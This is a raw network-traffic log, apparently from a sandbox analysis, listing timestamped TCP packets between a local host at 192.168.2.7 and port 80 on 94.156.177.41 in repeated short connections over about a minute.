Nov 28, 2024 09:14:18.696933985 CET	80	49707	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:18.697510958 CET	49707	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:18.818223000 CET	80	49707	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:19.966336966 CET	80	49707	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:19.966474056 CET	80	49707	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:19.966495037 CET	49707	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:19.966525078 CET	49707	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:20.086493015 CET	80	49707	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:20.108941078 CET	49709	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:20.228990078 CET	80	49709	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:20.229068041 CET	49709	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:20.231441021 CET	49709	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:20.351324081 CET	80	49709	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:20.351381063 CET	49709	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:20.471383095 CET	80	49709	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:21.741441965 CET	80	49709	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:21.741700888 CET	80	49709	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:21.741704941 CET	49709	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:21.741750956 CET	49709	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:21.861763000 CET	80	49709	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:21.913414001 CET	49710	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:22.033404112 CET	80	49710	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:22.033480883 CET	49710	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:22.036772966 CET	49710	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:22.156819105 CET	80	49710	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:22.160779953 CET	49710	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:22.280843019 CET	80	49710	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:23.475658894 CET	80	49710	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:23.475668907 CET	80	49710	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:23.475744009 CET	49710	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:23.475812912 CET	49710	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:23.596376896 CET	80	49710	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:23.617713928 CET	49716	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:23.737803936 CET	80	49716	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:23.737895012 CET	49716	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:23.740595102 CET	49716	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:23.860564947 CET	80	49716	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:23.860631943 CET	49716	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:23.980869055 CET	80	49716	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:25.137492895 CET	80	49716	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:25.137665033 CET	49716	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:25.137798071 CET	80	49716	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:25.137850046 CET	49716	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:25.257595062 CET	80	49716	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:25.277425051 CET	49722	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:25.397370100 CET	80	49722	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:25.397453070 CET	49722	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:25.399589062 CET	49722	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:25.519596100 CET	80	49722	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:25.519659042 CET	49722	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:25.640659094 CET	80	49722	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:27.269006014 CET	80	49722	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:27.269052982 CET	80	49722	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:27.269118071 CET	49722	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:27.269160032 CET	49722	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:27.389086962 CET	80	49722	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:27.422321081 CET	49730	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:27.544291973 CET	80	49730	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:27.544846058 CET	49730	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:27.547003031 CET	49730	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:27.667010069 CET	80	49730	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:27.668725014 CET	49730	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:27.788732052 CET	80	49730	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:28.997591019 CET	80	49730	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:28.997689009 CET	49730	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:28.997730970 CET	80	49730	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:28.997772932 CET	49730	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:29.117592096 CET	80	49730	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:29.142827988 CET	49733	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:29.262748003 CET	80	49733	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:29.262839079 CET	49733	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:29.265110016 CET	49733	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:29.385305882 CET	80	49733	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:29.385370016 CET	49733	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:29.505450964 CET	80	49733	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:30.852818966 CET	80	49733	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:30.852920055 CET	49733	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:30.852936983 CET	80	49733	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:30.852986097 CET	49733	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:30.973009109 CET	80	49733	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:30.992973089 CET	49739	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:31.113060951 CET	80	49739	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:31.113189936 CET	49739	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:31.115309000 CET	49739	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:31.235208035 CET	80	49739	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:31.235320091 CET	49739	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:31.355319023 CET	80	49739	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:32.658634901 CET	80	49739	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:32.658742905 CET	49739	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:32.658898115 CET	80	49739	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:32.658938885 CET	49739	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:32.778681993 CET	80	49739	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:32.804636955 CET	49745	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:32.924704075 CET	80	49745	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:32.924837112 CET	49745	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:32.931236029 CET	49745	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:33.051224947 CET	80	49745	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:33.051469088 CET	49745	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:33.171437979 CET	80	49745	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:34.411667109 CET	80	49745	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:34.411832094 CET	80	49745	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:34.411967993 CET	49745	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:34.412131071 CET	49745	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:34.531966925 CET	80	49745	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:34.554773092 CET	49750	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:34.674658060 CET	80	49750	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:34.674797058 CET	49750	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:34.677262068 CET	49750	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:34.797173023 CET	80	49750	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:34.797317028 CET	49750	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:34.919193029 CET	80	49750	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:36.257673025 CET	80	49750	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:36.257754087 CET	80	49750	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:36.257829905 CET	49750	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:36.257889986 CET	49750	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:36.377840042 CET	80	49750	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:36.420623064 CET	49755	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:36.540707111 CET	80	49755	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:36.540818930 CET	49755	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:36.543272972 CET	49755	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:36.663381100 CET	80	49755	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:36.663455963 CET	49755	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:36.783449888 CET	80	49755	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:38.124994040 CET	80	49755	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:38.125119925 CET	80	49755	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:38.125230074 CET	49755	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:38.125335932 CET	49755	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:38.246284962 CET	80	49755	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:38.276103020 CET	49760	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:38.396275997 CET	80	49760	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:38.396361113 CET	49760	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:38.398513079 CET	49760	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:38.518390894 CET	80	49760	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:38.518569946 CET	49760	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:38.638530970 CET	80	49760	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:39.946322918 CET	80	49760	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:39.946419001 CET	49760	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:39.946614027 CET	80	49760	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:39.946661949 CET	49760	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:40.066663980 CET	80	49760	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:40.086544037 CET	49764	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:40.207299948 CET	80	49764	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:40.207508087 CET	49764	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:40.209947109 CET	49764	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:40.329955101 CET	80	49764	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:40.330194950 CET	49764	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:40.450066090 CET	80	49764	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:41.795125961 CET	80	49764	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:41.795375109 CET	80	49764	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:41.795444012 CET	49764	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:41.795497894 CET	49764	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:41.915447950 CET	80	49764	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:42.291522980 CET	49770	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:42.411644936 CET	80	49770	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:42.411780119 CET	49770	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:42.414340973 CET	49770	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:42.534320116 CET	80	49770	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:42.534472942 CET	49770	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:42.654577971 CET	80	49770	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:43.957528114 CET	80	49770	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:43.957642078 CET	80	49770	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:43.957647085 CET	49770	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:43.957691908 CET	49770	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:44.077722073 CET	80	49770	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:44.102941990 CET	49775	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:44.222898960 CET	80	49775	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:44.223175049 CET	49775	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:44.225384951 CET	49775	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:44.345629930 CET	80	49775	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:44.345690966 CET	49775	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:44.465722084 CET	80	49775	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:45.763281107 CET	80	49775	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:45.763384104 CET	80	49775	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:45.763442993 CET	49775	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:45.763489962 CET	49775	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:45.883416891 CET	80	49775	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:45.907886028 CET	49779	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:46.027906895 CET	80	49779	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:46.028026104 CET	49779	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:46.037662029 CET	49779	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:46.157742977 CET	80	49779	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:46.159487009 CET	49779	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:46.279572010 CET	80	49779	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:47.671871901 CET	80	49779	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:47.672061920 CET	80	49779	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:47.672120094 CET	49779	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:47.672161102 CET	49779	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:47.792084932 CET	80	49779	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:47.820902109 CET	49785	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:47.940947056 CET	80	49785	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:47.941035032 CET	49785	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:47.943588972 CET	49785	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:48.063630104 CET	80	49785	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:48.063766003 CET	49785	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:48.183825970 CET	80	49785	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:49.534215927 CET	80	49785	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:49.534383059 CET	80	49785	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:49.534405947 CET	49785	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:49.534445047 CET	49785	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:49.654366016 CET	80	49785	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:49.680223942 CET	49791	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:49.800507069 CET	80	49791	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:49.800600052 CET	49791	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:49.802853107 CET	49791	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:49.922825098 CET	80	49791	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:49.922880888 CET	49791	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:50.042838097 CET	80	49791	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:51.346460104 CET	80	49791	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:51.346606016 CET	49791	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:51.346610069 CET	80	49791	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:51.346668959 CET	49791	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:51.466613054 CET	80	49791	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:51.494152069 CET	49795	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:51.614540100 CET	80	49795	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:51.614634037 CET	49795	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:51.616909981 CET	49795	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:51.736905098 CET	80	49795	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:51.737035990 CET	49795	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:51.857009888 CET	80	49795	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:53.209688902 CET	80	49795	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:53.209852934 CET	80	49795	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:53.209908962 CET	49795	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:53.214732885 CET	49795	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:53.334685087 CET	80	49795	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:53.417813063 CET	49799	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:53.537884951 CET	80	49799	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:53.538090944 CET	49799	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:53.571193933 CET	49799	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:53.691185951 CET	80	49799	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:53.691338062 CET	49799	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:53.811299086 CET	80	49799	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:55.171257973 CET	80	49799	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:55.171408892 CET	80	49799	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:55.171475887 CET	49799	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:55.171506882 CET	49799	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:55.291439056 CET	80	49799	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:55.319854021 CET	49804	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:55.439927101 CET	80	49804	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:55.440172911 CET	49804	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:55.442383051 CET	49804	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:55.562302113 CET	80	49804	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:55.562437057 CET	49804	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:55.682601929 CET	80	49804	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:57.021995068 CET	80	49804	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:57.022038937 CET	80	49804	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:57.022104979 CET	49804	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:57.022406101 CET	49804	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:57.142376900 CET	80	49804	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:57.171819925 CET	49808	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:57.291899920 CET	80	49808	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:57.292061090 CET	49808	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:57.294624090 CET	49808	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:57.414588928 CET	80	49808	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:57.414725065 CET	49808	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:57.534584045 CET	80	49808	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:58.885855913 CET	80	49808	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:58.885993004 CET	80	49808	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:58.886053085 CET	49808	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:58.888678074 CET	49808	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:59.006861925 CET	80	49808	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:59.029784918 CET	49814	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:59.149698973 CET	80	49814	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:59.149815083 CET	49814	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:59.152620077 CET	49814	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:59.272629976 CET	80	49814	94.156.177.41	192.168.2.7
Nov 28, 2024 09:14:59.272741079 CET	49814	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:14:59.392962933 CET	80	49814	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:00.692267895 CET	80	49814	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:00.692289114 CET	80	49814	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:00.692481995 CET	49814	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:00.695126057 CET	49814	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:00.818473101 CET	80	49814	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:00.847510099 CET	49820	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:00.967649937 CET	80	49820	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:00.967858076 CET	49820	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:00.971061945 CET	49820	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:01.091104031 CET	80	49820	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:01.091238976 CET	49820	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:01.213289976 CET	80	49820	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:02.364192009 CET	80	49820	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:02.364324093 CET	80	49820	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:02.364423990 CET	49820	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:02.364520073 CET	49820	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:02.484510899 CET	80	49820	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:02.508704901 CET	49823	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:02.628673077 CET	80	49823	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:02.628834009 CET	49823	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:02.630995989 CET	49823	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:02.750912905 CET	80	49823	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:02.750976086 CET	49823	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:02.870970011 CET	80	49823	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:04.221290112 CET	80	49823	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:04.221323967 CET	80	49823	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:04.221399069 CET	49823	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:04.221453905 CET	49823	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:04.341289997 CET	80	49823	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:04.368134022 CET	49829	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:04.488385916 CET	80	49829	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:04.488569021 CET	49829	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:04.490891933 CET	49829	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:04.610960007 CET	80	49829	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:04.611133099 CET	49829	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:04.731062889 CET	80	49829	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:06.031249046 CET	80	49829	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:06.031290054 CET	80	49829	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:06.031419992 CET	49829	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:06.036458015 CET	49829	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:06.156296968 CET	80	49829	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:06.183024883 CET	49833	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:06.303078890 CET	80	49833	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:06.303174019 CET	49833	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:06.305591106 CET	49833	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:06.425457954 CET	80	49833	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:06.425626993 CET	49833	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:06.545587063 CET	80	49833	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:07.898154020 CET	80	49833	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:07.898283958 CET	80	49833	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:07.898324966 CET	49833	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:07.898324966 CET	49833	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:08.018341064 CET	80	49833	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:08.040370941 CET	49839	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:08.160428047 CET	80	49839	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:08.160593987 CET	49839	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:08.162962914 CET	49839	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:08.282944918 CET	80	49839	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:08.283034086 CET	49839	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:08.402939081 CET	80	49839	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:09.702014923 CET	80	49839	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:09.702095032 CET	80	49839	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:09.702159882 CET	49839	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:09.702179909 CET	49839	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:09.822078943 CET	80	49839	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:09.850207090 CET	49844	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:09.970186949 CET	80	49844	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:09.970455885 CET	49844	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:09.972512007 CET	49844	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:10.092473984 CET	80	49844	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:10.092586994 CET	49844	80	192.168.2.7	94.156.177.41
Nov 28, 2024 09:15:10.212503910 CET	80	49844	94.156.177.41	192.168.2.7
Nov 28, 2024 09:15:11.605264902 CET	80	49844	94.156.177.41	192.168.2.7
